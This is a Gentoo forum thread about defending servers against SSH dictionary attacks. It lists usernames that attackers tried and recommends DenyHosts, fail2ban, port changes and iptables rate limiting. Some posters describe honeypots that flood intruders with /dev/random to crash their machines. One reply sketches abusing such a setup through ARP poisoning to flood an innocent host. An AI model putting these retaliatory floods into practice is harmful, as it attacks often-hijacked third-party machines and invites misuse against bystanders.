Usernames spam, erin, draco, bank, 123, abc123, abc, ghost, admin, nobody, ftpuser, allan, dummy, public, test, danny, linda, www, www-data, info, sales, oracle, support, testing, yamaguchi, alonso, cynthia, stefan, fuck, karl, ed, angela, fred, amy, pgsql, upload, chris, pop, franklin, andrew, owner, owners, op, db, anita, bind, ben, beny, bert, alin, theo, philip, roland, emil, enzo, felix, francis, ian, ismail, jared42, akcesbenefit, greg, cs, wwwrun, rolo, web1, matt, web, anonymous, apples, xxx, miller, chicago, tweety, snoopy, ashley, bandit, madison, princess, viper, francois, mortimer, lucas, leslie, leroy, lara, sec2, sec1, sec, kassa, maneager, maneager1, emi, emiliano, cafe, internet, play, open, samba, kathi, cgi, nicole, denied, work, cyborg, right, file, text, gnome, kde, lftp, ventas, spg, jag, ag1, ac, lm, aa, jg, khan, rmgadm!, rmgadmin, daniel, hectorh, epanchi, pvm, junkbust, radvd, dennis vivian, larry, jacob, game, cvs, benahmed, rachafi, ramamurthy, tia, ricky, nuzahar, cindy, bernard, ace-html, bestrella, darcos, vojeda, smakom, bannamuki, yoshida, tunekiyo, yakayama, t-miyata, t-ikeda, shigeno, mizoguti, kyoda, kawano, jinta, horii, eigyou, dozono, denryoku, anthony, hunter, joshua, exit, juan, nathan, william, yusaf, sitasubedi, sanjiv, sagun, rajen, kamal, arun, aroon, smc, tcp, log, logs, administrator, jack, marvin, andrea, barbara, adine, alan, albert, alberto, alex, alfred, ali, alice, allan, andi, andrew, student, r00t, download, nigel, upload, services, office, bobby, username, sharon, aron, brett, alex, mike, data, http, httpd, shop, ........................ many many many more, and those were all from 222.122.21.202 just yesterday.  :Smile: 

I should install DShield on my Smoothwall. That would be cool to see how much it lessens the impact. I have been using public-key auth since I first saw the attacks last October. My passwords are fine, but I'm afraid some of my users probably use bad passwords.

I would like to block all of these attempts simply to save processor cycles, Internet congestion, and intranet congestion. I thought about installing that 'reactive' firewall mod for Smoothwall too... too many connection attempts within so many seconds from a given IP and it automagically firewalls that IP.

J

----------

## kamikaze04

yottabit, you would like to test Denyhosts, great program, and it blocks IPs doing dictionary attacks perfectly. I really recommend it. My servers passed from thousands of login attempts in a month to 10 in a day  :Smile: 

----------

## yottabit

 *kamikaze04 wrote:*   

> yottabit, you would like to test Denyhosts, great program, and it blocks IPs doing dictionary attacks perfectly. I really recommend it. My servers passed from thousands of login attempts in a month to 10 in a day 

 

Excellent tool and already in Portage. Thanks!!

----------

## LostControl

 *kamikaze04 wrote:*   

> yottabit, you would like to test Denyhosts, great program, and it blocks IPs doing dictionary attacks perfectly. I really recommend it. My servers passed from thousands of login attempts in a month to 10 in a day 

 

You can also try fail2ban  :Wink: 

----------

## Bigun

Guh, I now have an 11 Mb log of nothing but SSH login attempts!

This is old, any way possible to honeypot the attempts to make it quit hogging bandwidth?

I attempted to stop sshd but the script wouldn't stop trying.

I mean, make some lame username like "a" with the password "a" and make the default shell /dev/null or something.

----------

## Barnoid

 *bigun89 wrote:*   

> Guh, I now have an 11 Mb log of nothing but SSH login attempts!
> 
> This is old, any way possible to honeypot the attempts to make it quit hogging bandwidth?
> 
> I attempted to stop sshd but the script wouldn't stop trying.
> ...

 

It's been said before, I'll say it again: change the port of your SSH server. It's that simple. I haven't had one incident since I've changed it (~2 years ago).

----------

## Adrien

 *Barnoid wrote:*   

> It's been said before, I'll say it again: change the port of your SSH server. It's that simple. I haven't had one incident since I've changed it (~2 years ago).

 

I'm not sure it's definitely the best idea as most of ssh bruteforce attacks start with a portscan.

----------

## piercey

 *Adrien wrote:*   

>  *Barnoid wrote:*   It's been said before, I'll say it again: change the port of your SSH server. It's that simple. I haven't had one incident since I've changed it (~2 years ago). 
> 
> I'm not sure it's definitely the best idea as most of ssh bruteforce attacks start with a portscan.

 

A regular portscan won't go over a certain number of ports anyway, so choosing a high enough port is another way around this problem.

Of course not everyone can just change their port number, and that's why these tools exist.

----------

## linuxgeekery

I've had several hundred breakin attempts over the last 2 days. I created a 'test test' account with a honeypot script as its shell. So when the hacker gets in, he'll be greeted with a message saying "Sorry, this box is secured. =)" and a "cat /dev/urandom". It also logs the IP address and sends it to a log.

----------

## assaf

 *linuxgeekery wrote:*   

> and a "cat /dev/urandom"

 

I'm sure the poor hacker will be crying himself to sleep tonight   :Razz: 

----------

## MrUlterior

 *linuxgeekery wrote:*   

> I've had several hundred breakin attempts over the last 2 days. I created a 'test test' account with a honeypot script as its shell. So when the hacker gets in, he'll be greeted with a message saying "Sorry, this box is secured. =)" and a "cat /dev/urandom". It also logs the IP address and sends it to a log.

 

So, in order to DoS you I just need to connect as test/test several hundred times till I saturate your connection.... that's smart!  :Razz: 

----------

## vectox

Lol.. gotta love that last one.  I think it's better to reduce the load on the system completely.  You're right... a few hundred attempts and the system is overloaded with honeypot processes.  Sure it's cool on a user level, but most of these attempts are scripted and flooding the Internet with hundreds of attempts and the hacker is never going to see your "this box is secure" msg.  Use metalog... so it puts all sshd events in an sshd folder separate from the syslog.... save yourself grepping the syslog file.  I had ssh running on the standard ol' port 22 for a while..... I got tons of brute force attempts... mostly from Korea, China and a small number from the US.... reporting them all is a wasted effort... and most of them I would guess are just zombie boxes anyway... not the actual hacker's box.

My solution, same as the person above, is to just change the port you're running sshd on.  It's simple.... no extra processing on your server and unless your server is public to many users expecting to ssh to port 22..... you're likely the only one logging onto it anyway.  It still allows you to log onto it from anywhere in the world.  Also like the user above I've been running sshd on a non-standard high port and haven't had one brute force attempt since... all the failed password attempts are by yours truly  :Smile: .

Suck it up people...change the stupid port!

----------

## Bigun

*snip*

 *vectox wrote:*   

> ...Use metalog... so it puts all sshd events in an sshd folder separate from the syslog.... save yourself grepping the syslog file....

 

*snip*

Syslog-ng is capable as well.

https://forums.gentoo.org/viewtopic-t-399997-highlight-ssh.html

----------

## RBH

I feel left out: despite having had a static IP for nearly 2 and a half years, I've not had one failed SSH login appear in my logs that wasn't my own doing. I run chkrootkit periodically (i.e. when I'm logged in finding things to do) and have never found anything.

I expect this is because my boxes are always behind a router that denies all packets that aren't specifically permitted (HTTP, DNS et al). Do you guys all connect directly, or something? Wouldn't a hardware router - just a bog standard Netgear one - be a good idea?

I might be talking out of my backside and apologies if that's the case, but this seems to be something of an obvious step to take.

----------

## Bigun

 *RBH wrote:*   

> I feel left out: despite having had a static IP for nearly 2 and a half years, I've not had one failed SSH login appear in my logs that wasn't my own doing. I run chkrootkit periodically (i.e. when I'm logged in finding things to do) and have never found anything.
> 
> I expect this is because my boxes are always behind a router that denies all packets that aren't specifically permitted (HTTP, DNS et al). Do you guys all connect directly, or something? Wouldn't a hardware router - just a bog standard Netgear one - be a good idea?
> 
> I might be talking out of my backside and apologies if that's the case, but this seems to be something of an obvious step to take.

 

It depends, my box *IS* the router, therefore having a NetGear router in front of it is mundane and rickety.  

Besides, I trust the security of a Gentoo box that I manage 10 fold over a homegrade NetGear router.

Yes, it's added security in the physical sense.  But it's one more thing to break, one more thing to manage, and one more thing to go wrong.  If your Gentoo box takes care of it, along with the added bonus of being able to log it, why put in a router at all?

----------

## assaf

 *RBH wrote:*   

> I feel left out: despite having had a static IP for nearly 2 and a half years, I've not had one failed SSH login appear in my logs that wasn't my own doing. I run chkrootkit periodically (i.e. when I'm logged in finding things to do) and have never found anything.
> 
> I expect this is because my boxes are always behind a router that denies all packets that aren't specifically permitted (HTTP, DNS et al). Do you guys all connect directly, or something? Wouldn't a hardware router - just a bog standard Netgear one - be a good idea?
> 
> I might be talking out of my backside and apologies if that's the case, but this seems to be something of an obvious step to take.

 

If your router does not allow ssh then what's the point? You may as well not run sshd at all, or if you want to access it only from the LAN you could add a simple iptables rule.

----------

## linuxgeekery

Update on that script that I talked about a few pages before. Thanks for people pointing out the flaws. I added to the script a section that runs another script. That script runs a "ps aux" every minute, with some sed and grep action. If there are more than 30 instances of the honeypot, it kills off all of the honeypots using kill -9 and pidof.

----------

## MrUlterior

 *linuxgeekery wrote:*   

> Update on that script that I talked about a few pages before. Thanks for people pointing out the flaws. I added to the script a section that runs another script. That script runs a "ps aux" every minute, with some sed and grep action. If there are more than 30 instances of the honeypot, it kills off all of the honeypots using kill -9 and pidof.

 

Which makes the assumption that I can't make sufficient connections to your machine in under a minute to bring it down ... worse still it means I could use YOU to make a DoS attack, all I have to do is poison your ARP cache to make you think that my IP is in fact the desired target, and suddenly you're sending the contents of /dev/random to a complete innocent. The puzzled expression on your face when your ISP annuls your contract & requests your presence in court will be priceless.

Getting the picture? Counter-measures you don't understand are more dangerous to you than the undesirables you're trying to dissuade from bothering you.

----------

## MrUlterior

 *linuxgeekery wrote:*   

> Update on that script that I talked about a few pages before. Thanks for people pointing out the flaws. I added to the script a section that runs another script. That script runs a "ps aux" every minute, with some sed and grep action. If there are more than 30 instances of the honeypot, it kills off all of the honeypots using kill -9 and pidof.

 

Or if you want to do this properly, see connection tarpitting. This is a method used often in anti-spam, which subtly alters the TCP response to an identified attacker effectively trapping them .. I'll leave you to do your research.

----------

## erikstotle

I have a hardware router and I still get those ssh attacks.  They get incessantly annoying.  I suggest that you install iptables and then use dynfw (it's not in portage, you can get it from http://www.gentoo.org/doc/en/articles/files/dynfw-1.0.1.tar.bz2).  Once you have that installed, you can block IPs and limit the number of new connections per minute/hour/day on a port on the fly.  For example, since I only use ssh for remote administration, I limit the number of new connections per minute on port 22 to 1.  This does get annoying if you login incorrectly because you have to wait a minute before trying again, but it does make the ssh cracking scripts give up quite quickly.  And even if it doesn't give up, only about 1/60th of its login attempts get through.

For further reading go to this rather humorous article:

http://www.gentoo.org/doc/en/articles/dynamic-iptables-firewalls.xml

----------

## Bigun

~~snip~~

 *erikstotle wrote:*   

> For further reading go to this rather humorous article:
> 
> http://www.gentoo.org/doc/en/articles/dynamic-iptables-firewalls.xml

 

I really like the ipdrop script, I'm going to start a thread in the programming forum to see if I can get it to run a bit better.

----------

## minskpower

To everybody complaining about ssh flooding - why don't you change the port to something else, you won't be bothered by those worms, they don't generally scan the upper ports, even if they do I doubt they can recognise it's running ssh (at this time). This solution applies if you are not limited by a third party firewall.

----------

## Bigun

The IPdrop script stops the attacks in their tracks.  I only wish there was a script that ran in the background to detect such attacks and add the IP to the droplist automatically.

----------

## dpetka2001

hello just got back home and observed something strange on my computer... some files and directories were deleted and i found them in the Trash Can... the thing is that they were in different spots on my Desktop and it is very unlikely that someone might have accidentally deleted them without having selected all of them on his own... i think i might have been hacked but am not really sure about it... how could i verify if i was hacked or not? could you please show me the way to do this because i don't really know how to do it? thanks in advance...

----------

## Bigun

Heh.... typically when you're hacked, they don't move your icons or move stuff to your trash bin.

Try going to a more secure password and locking your bedroom door.

----------

## dpetka2001

well i don't think that anyone from my family would do such a thing... they don't know much about computers... anyway... is there something that i could check in order to find out if there was any attempt?

----------

## jamapii

Sorry, I was waiting for this to unload my thoughts...

 *erikstotle wrote:*   

> They get incessently annoying.

 

Filter them in syslog  :Wink: 

Seriously, I repeat I think this issue is overrated. Trying 1 to 3 possible passwords on 100 accounts is no threat to security unless you have users with passwords such as "12345", "hello" or username_spelled_backwards.

It would be a threat if there was a security hole in ssh. There will be a threat when there is a known security hole in ssh. To reduce the likelihood of a successful attack, I would recommend a nonstandard port, possibly disabling password logins, possibly portknocking. About any ratelimiting solutions with iptables, be careful, you might lock yourself out. The IP droplist might be good, too, for any attack, but also makes a DOS attack possible (with IP spoofing).

And start worrying about real security problems. Especially if you think WEP provides any security (it doesn't).

----------

## jamapii

 *dpetka2001 wrote:*   

> hello just got back home and observed something strange on my computer... some files and directories were deleted and i found them in the Trash Can... the thing is that they were in different spots on my Desktop

 

looks more like some kind of "practical joke", nothing serious, but it might mean that you have a security hole. Maybe a weak password, maybe vnc or X server access to the world, maybe you left the computer for 5 minutes without xlock

There is a feature in Gnome, maybe called desktop sharing or something, which really is vnc access.

----------

## linuxgeekery

 *MrUlterior wrote:*   

>  *linuxgeekery wrote:*   Update on that script that I talked about a few pages before. Thanks for people pointing out the flaws. I added to the script a section that runs another script. That script runs a "ps aux" every minute, with some sed and grep action. If there are more than 30 instances of the honeypot, it kills off all of the honeypots using kill -9 and pidof. 
> 
> Or if you want to do this properly, see connection tarpitting. This is a method used often in anti-spam, which subtly alters the TCP response to an identified attacker effectively trapping them .. I'll leave you to do your research.

 

This proves once again that I am very incompetent with creating honeypots and things of that sort.   :Wink:  Thanks for the information. I read up on connection tarpitting. Seems interesting...

----------

## dpetka2001

 *jamapii wrote:*   

> looks more like some kind of "practical joke", nothing serious, but it might mean that you have a security hole. Maybe a weak password, maybe vnc or X server access to the world, maybe you left the computer for 5 minutes without xlock
> 
> There is a feature in Gnome, maybe called desktop sharing or something, which really is vnc access.

well a friend of mine checked on my system with Nessus and told me that it found only 2 services running...a pop server (freepops) and a web server (amuleweb)...i don't have any services running except for the above mentioned...i don't think i have a weak password as it is 9 characters long including numbers...there's no vnc running...i run KDE and am not aware of any such feature nor do i know if it's activated by default...how can i activate xlock if there is such a thing in KDE?? thanks...

----------

## mpicklesimer

I have an OpenBSD box running 'pf' for the firewall on my home network. I'm wondering if it would be worth the time to block all traffic coming from those ips? What would you suggest (if different) if I were talking about a business site? Not that much of this matters, cuz I'm using strong keys instead of passwords, but I'm just curious.

----------

## Bigun

I'm putting a honeypot on my server with the username/password test.

It basically logs the date and time the script is executed, then cats /dev/random to them until the bot forces the machine's RAM to spill over to SWAP and eventually DoS.  Aside from wasting bandwidth that I have plenty to spare of, it should also help alert the server-admin to trouble.

And to cover my buttocks, there is a message in my sshd.motd that says unauthorized access is prohibited.

----------

